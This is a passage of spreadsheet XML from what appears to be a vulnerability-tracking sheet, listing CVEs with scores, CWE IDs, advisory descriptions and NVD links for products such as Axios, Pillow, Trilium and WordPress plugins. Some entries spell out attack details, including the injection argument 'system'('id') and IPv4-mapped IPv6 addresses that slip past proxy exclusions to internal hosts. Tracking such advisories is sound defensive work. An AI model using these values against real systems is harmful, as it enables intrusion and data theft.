      <c r="F1373" s="5" t="inlineStr"/>
      <c r="G1373" s="5" t="inlineStr"/>
      <c r="H1373" s="5" t="inlineStr"/>
      <c r="I1373" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1373" s="5" t="inlineStr"/>
      <c r="K1373" s="5" t="inlineStr">
        <is>
          <t>CWE-757</t>
        </is>
      </c>
      <c r="L1373" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has a Use of Insecure Protocol vulnerability. Due to the reliance on ZMTP Null mode, unauthenticated attackers on the same network can capture packets to leak transmitted data, or perform replay attacks with forged commands to disrupt classroom operations.</t>
        </is>
      </c>
      <c r="M1373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89177</t>
        </is>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89178</t>
        </is>
      </c>
      <c r="C1374" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1374" s="5" t="inlineStr"/>
      <c r="F1374" s="5" t="inlineStr"/>
      <c r="G1374" s="5" t="inlineStr"/>
      <c r="H1374" s="5" t="inlineStr"/>
      <c r="I1374" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1374" s="5" t="inlineStr"/>
      <c r="K1374" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="L1374" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has an Origin Validation Error vulnerability. Unauthenticated attackers on the same network can spoof the teacher workstation and send broadcast packets, causing student computers to attempt to establish a connection with the attacker.</t>
        </is>
      </c>
      <c r="M1374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89178</t>
        </is>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89250</t>
        </is>
      </c>
      <c r="C1375" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1375" s="5" t="inlineStr"/>
      <c r="F1375" s="5" t="inlineStr"/>
      <c r="G1375" s="5" t="inlineStr"/>
      <c r="H1375" s="5" t="inlineStr"/>
      <c r="I1375" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1375" s="5" t="inlineStr"/>
      <c r="K1375" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1375" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an unauthenticated file read vulnerability in the getRecordedFile.php endpoint that streams recorded FLV files from the temporary directory. Attackers can request the endpoint with a known or guessed stream key to download recorded live video files without authentication or authorization checks.</t>
        </is>
      </c>
      <c r="M1375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89250</t>
        </is>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1376" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-35585</t>
        </is>
      </c>
      <c r="C1376" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1376" s="5" t="inlineStr"/>
      <c r="F1376" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1376" s="5" t="inlineStr"/>
      <c r="H1376" s="5" t="inlineStr"/>
      <c r="I1376" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1376" s="5" t="inlineStr"/>
      <c r="K1376" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1376" s="5" t="inlineStr">
        <is>
          <t>Oxford Nanopore MinKNOW before 24.06 relies on a client's source IP address for authentication.</t>
        </is>
      </c>
      <c r="M1376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-35585</t>
        </is>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1377" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61732</t>
        </is>
      </c>
      <c r="C1377" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1377" s="5" t="inlineStr"/>
      <c r="F1377" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1377" s="5" t="inlineStr"/>
      <c r="H1377" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I1377" s="5" t="inlineStr">
        <is>
          <t>2026-02-05</t>
        </is>
      </c>
      <c r="J1377" s="5" t="inlineStr"/>
      <c r="K1377" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1377" s="5" t="inlineStr">
        <is>
          <t>A discrepancy between how Go and C/C++ comments were parsed allowed for code smuggling into the resulting cgo binary.</t>
        </is>
      </c>
      <c r="M1377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61732</t>
        </is>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10754</t>
        </is>
      </c>
      <c r="C1378" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1378" s="5" t="inlineStr"/>
      <c r="F1378" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1378" s="5" t="inlineStr"/>
      <c r="H1378" s="5" t="inlineStr"/>
      <c r="I1378" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1378" s="5" t="inlineStr"/>
      <c r="K1378" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1378" s="5" t="inlineStr">
        <is>
          <t>Pega Platform versions 8.5.0 through 25.1.2 are affected by an improper validation of cryptographic signatures that may allow an attacker to bypass security controls.</t>
        </is>
      </c>
      <c r="M1378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10754</t>
        </is>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14962</t>
        </is>
      </c>
      <c r="C1379" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1379" s="5" t="inlineStr"/>
      <c r="F1379" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1379" s="5" t="inlineStr"/>
      <c r="H1379" s="5" t="inlineStr"/>
      <c r="I1379" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1379" s="5" t="inlineStr"/>
      <c r="K1379" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1379" s="5" t="inlineStr">
        <is>
          <t>The ELEX WooCommerce Request a Quote WordPress plugin before 2.4.1 does not properly sanitise and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks and extract arbitrary data from the database.</t>
        </is>
      </c>
      <c r="M1379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14962</t>
        </is>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19233</t>
        </is>
      </c>
      <c r="C1380" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1380" s="5" t="inlineStr"/>
      <c r="F1380" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1380" s="5" t="inlineStr"/>
      <c r="H1380" s="5" t="inlineStr"/>
      <c r="I1380" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1380" s="5" t="inlineStr"/>
      <c r="K1380" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1380" s="5" t="inlineStr">
        <is>
          <t>CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized command execution and disclosure of server data when an attacker with a privileged account sends crafted, unvalidated parameters to a server endpoint.</t>
        </is>
      </c>
      <c r="M1380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19233</t>
        </is>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="C1381" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1381" s="5" t="inlineStr"/>
      <c r="F1381" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1381" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1381" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I1381" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1381" s="5" t="inlineStr"/>
      <c r="K1381" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1381" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="M1381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25990</t>
        </is>
      </c>
      <c r="C1382" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1382" s="5" t="inlineStr"/>
      <c r="F1382" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1382" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1382" s="5" t="inlineStr">
        <is>
          <t>python:pillow</t>
        </is>
      </c>
      <c r="I1382" s="5" t="inlineStr">
        <is>
          <t>2026-02-11</t>
        </is>
      </c>
      <c r="J1382" s="5" t="inlineStr"/>
      <c r="K1382" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1382" s="5" t="inlineStr">
        <is>
          <t>Pillow is a Python imaging library. From 10.3.0 to before 12.1.1, an out-of-bounds write may be triggered when loading a specially crafted PSD image. This vulnerability is fixed in 12.1.1.</t>
        </is>
      </c>
      <c r="M1382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25990</t>
        </is>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26212</t>
        </is>
      </c>
      <c r="C1383" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1383" s="5" t="inlineStr"/>
      <c r="F1383" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1383" s="5" t="inlineStr"/>
      <c r="H1383" s="5" t="inlineStr"/>
      <c r="I1383" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1383" s="5" t="inlineStr"/>
      <c r="K1383" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1383" s="5" t="inlineStr">
        <is>
          <t>Rara One Click Demo Import plugin for WordPress before 1.3.5 contains an arbitrary file upload vulnerability that allows authenticated attackers with Administrator privileges to upload arbitrary PHP files by passing a false value to wp_handle_upload() that disables WordPress core's file type validation checks across all three file parameters in the process_uploaded_files() function. Attackers can upload a malicious PHP file to the uploads directory and execute it over HTTP to achieve remote code execution in the web server process, with the uploaded file persisting on disk even after plugin deactivation and leaving no media library record to evade standard integrity checks.</t>
        </is>
      </c>
      <c r="M1383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26212</t>
        </is>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34223</t>
        </is>
      </c>
      <c r="C1384" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1384" s="5" t="inlineStr"/>
      <c r="F1384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1384" s="5" t="inlineStr"/>
      <c r="H1384" s="5" t="inlineStr"/>
      <c r="I1384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1384" s="5" t="inlineStr"/>
      <c r="K1384" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1384" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Desigo CC ClickOnce Client V6 (All versions), Desigo CC ClickOnce Client V7 (All versions), Desigo CC family V8 (All versions), Desigo CC family V9 (All versions), Desigo CC Flex Client V6 (All versions), Desigo CC Flex Client V7 (All versions), Desigo CC Installed Client V6 (All versions), Desigo CC Installed Client V7 (All versions). The affected application is vulnerable to Client Code Execution (CCE) due to insufficient input validation when handling scripts embedded within user-defined graphics documents.  Specifically, when the script within a graphics document is designed or modified by an attacker to include malicious commands.  When a user opens a compromised graphics document, the embedded script is executed on the client application instance, allowing an attacker to write arbitrary files to the client's operating system. Successful exploitation requires an attacker to craft a malicious graphics document and entice a user with sufficient privileges to display it.  This could lead to compromise of the client operating system and potential lateral movement within the organization.</t>
        </is>
      </c>
      <c r="M1384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t>
        </is>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34741</t>
        </is>
      </c>
      <c r="C1385" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1385" s="5" t="inlineStr"/>
      <c r="F1385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1385" s="5" t="inlineStr"/>
      <c r="H1385" s="5" t="inlineStr"/>
      <c r="I1385" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1385" s="5" t="inlineStr"/>
      <c r="K1385" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1385" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, authentication bypass allows unauthenticated remote attackers to execute arbitrary PHP files from the env-production directory on a new iTop instance in the production environment. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34741</t>
        </is>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4129</t>
        </is>
      </c>
      <c r="C1386" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1386" s="5" t="inlineStr"/>
      <c r="F1386" s="5" t="inlineStr"/>
      <c r="G1386" s="5" t="inlineStr"/>
      <c r="H1386" s="5" t="inlineStr"/>
      <c r="I1386" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1386" s="5" t="inlineStr"/>
      <c r="K1386" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1386" s="5" t="inlineStr">
        <is>
          <t>There is an improper access control vulnerability in NI SystemLink that may allow an authenticated user with limited privileges to access host operating system files and directories that should be restricted. This vulnerability affects NI SystemLink and NI SystemLink Server 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="M1386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4129</t>
        </is>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44492</t>
        </is>
      </c>
      <c r="C1387" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1387" s="5" t="inlineStr"/>
      <c r="F1387" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1387" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1387" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1387" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1387" s="5" t="inlineStr"/>
      <c r="K1387" s="5" t="inlineStr">
        <is>
          <t>CWE-289, CWE-918</t>
        </is>
      </c>
      <c r="L1387" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as 127.0.0.1 or 169.254.169.254, a request URL using the IPv4-mapped IPv6 form (::ffff:7f00:1, ::ffff:a9fe:a9fe) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44492</t>
        </is>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45293</t>
        </is>
      </c>
      <c r="C1388" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1388" s="5" t="inlineStr"/>
      <c r="F1388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1388" s="5" t="inlineStr"/>
      <c r="H1388" s="5" t="inlineStr"/>
      <c r="I1388" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J1388" s="5" t="inlineStr"/>
      <c r="K1388" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1388" s="5" t="inlineStr">
        <is>
          <t>WordPress Coding Standards is a set of PHP_CodeSniffer rules (sniffs) that enforce WordPress coding conventions. From 0.14.1 until 3.4.1, the WordPress.WP.EnqueuedResourceParameters sniff (active in the WordPress and WordPress-Extra rulesets) reconstructed the $ver argument passed to functions such as wp_enqueue_script() and ran it through eval() inside its is_falsy() method, so a maliciously crafted argument such as 'system'('id') would execute during a scan; as a result, running PHPCS with WordPressCS over untrusted PHP (for example a CI pipeline that lints pull requests, or a developer reviewing third-party code) could lead to arbitrary command execution on the scanning host. The WordPress-Core and WordPress-Docs rulesets are not affected. This issue is fixed in version 3.4.1.</t>
        </is>
      </c>
      <c r="M1388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45293</t>
        </is>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47194</t>
        </is>
      </c>
      <c r="C1389" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1389" s="5" t="inlineStr"/>
      <c r="F1389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1389" s="5" t="inlineStr"/>
      <c r="H1389" s="5" t="inlineStr"/>
      <c r="I1389" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1389" s="5" t="inlineStr"/>
      <c r="K1389" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1389" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 15.108.0 and 16.18.3, temporary magic login link generation can use an attacker-controlled request Host header, allowing a remote attacker to cause emailed login links to point to an attacker-controlled domain and capture the login token when a recipient follows the link. This issue is fixed in versions 15.108.0 and 16.18.3.</t>
        </is>
      </c>
      <c r="M1389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47194</t>
        </is>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47664</t>
        </is>
      </c>
      <c r="C1390" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1390" s="5" t="inlineStr"/>
      <c r="F1390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1390" s="5" t="inlineStr"/>
      <c r="H1390" s="5" t="inlineStr"/>
      <c r="I1390" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1390" s="5" t="inlineStr"/>
      <c r="K1390" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="L1390" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, the `$import-pnp` operation in Pathling Server accepts a caller-supplied `exportUrl` and uses it as the remote FHIR Bulk Export endpoint without constraining it to a trusted source. When PNP credentials are configured, Pathling builds a credentialed bulk-export client targeting the caller-chosen host, downloads manifest-selected files, and then reclassifies those staged files as trusted local `file://` imports - bypassing the configured `allowableSources` allowlist that protects the ordinary `$import` operation. This is fixed in Pathling Server 2.0.0. As a workaround, disable the `$import-pnp` operation (`pathling.operations.importPnpEnabled=false`) or do not configure PNP credentials.</t>
        </is>
      </c>
      <c r="M1390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47664</t>
        </is>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47727</t>
        </is>
      </c>
      <c r="C1391" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1391" s="5" t="inlineStr"/>
      <c r="F1391" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1391" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1391" s="5" t="inlineStr"/>
      <c r="I1391" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1391" s="5" t="inlineStr"/>
      <c r="K1391" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L1391" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the default-on "Safe import" filter fails to neutralize the shareTemplate relation because that relation is not marked as dangerous, allowing an attacker-supplied import archive to plant a server-side template that leads to remote code execution. The relation is omitted from the built-in list of dangerous attributes, so unlike other code-loading relations it is not disabled on import, and when the victim later publishes the imported note the public share renderer feeds the linked EJS code note's raw bytes into ejs.render, which compiles them in the server's Node process. An unauthenticated request to the shared note then executes the attacker's JavaScript with full access to require, process, the filesystem, and the network. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M1391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47727</t>
        </is>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48007</t>
        </is>
      </c>
      <c r="C1392" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1392" s="5" t="inlineStr"/>
      <c r="F1392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1392" s="5" t="inlineStr"/>
      <c r="H1392" s="5" t="inlineStr"/>
      <c r="I1392" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1392" s="5" t="inlineStr"/>
      <c r="K1392" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1392" s="5" t="inlineStr">
        <is>
          <t>Element Call is a native Matrix video conferencing application. Versions 0.5.17 through 0.19.3 report analytics data to a PostHog server, when configured to by a `posthog` key in config.json or by the `posthogApiHost` and `posthogApiKey` URL parameters. Several fields of this data (`$initial_person_info`, `$session_entry_url`, and `$current_url`) were found to contain the full URL of the user's visited page, including the fragment. Users of a standalone Element Call ‘SPA’ instance such as https://call.element.io may therefore have reported the full URLs of certain calls, including encryption passwords, to the configured PostHog server, potentially compromising the confidentiality of the calls to actors who could access both the PostHog analytics data and the encrypted media streams. The same issue is present in Element Call's embedded package, but in practice it does not impact applications using this package (including Element Web, Element Desktop, Element X iOS, and Element X Android) because they distribute encryption keys over Matrix rather than encoding a password in the URL. The issue is patched in Element Call 0.19.4. Some workarounds are available. Users may opt out of analytics in the 'Feedback' tab of Element Call's settings and create new links for future calls. Admins who host Element Call as a standalone application may disable PostHog analytics entirely by removing the `posthog` key from their deployment's config.json file.</t>
        </is>
      </c>
      <c r="M1392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48007</t>
        </is>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48120</t>
        </is>
      </c>
      <c r="C1393" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1393" s="5" t="inlineStr"/>
      <c r="F1393" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1393" s="5" t="inlineStr"/>
      <c r="H1393" s="5" t="inlineStr"/>
      <c r="I1393" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1393" s="5" t="inlineStr"/>
      <c r="K1393" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1393" s="5" t="inlineStr">
        <is>
          <t>Kakoune is a code editor. Prior to version 2026.05.21, the bundled, enabled by default, `autorestore.kak` script can be exploited by malicious backup files leading to arbitrary kakoune and shell commands being executed by simply opening a file. Kakoune 2026.05.21 fixes the issue. As a workaround, add `autorestore-disable` to the user kakrc will disable the autorestore feature.</t>
        </is>
      </c>
      <c r="M1393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48120</t>
        </is>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
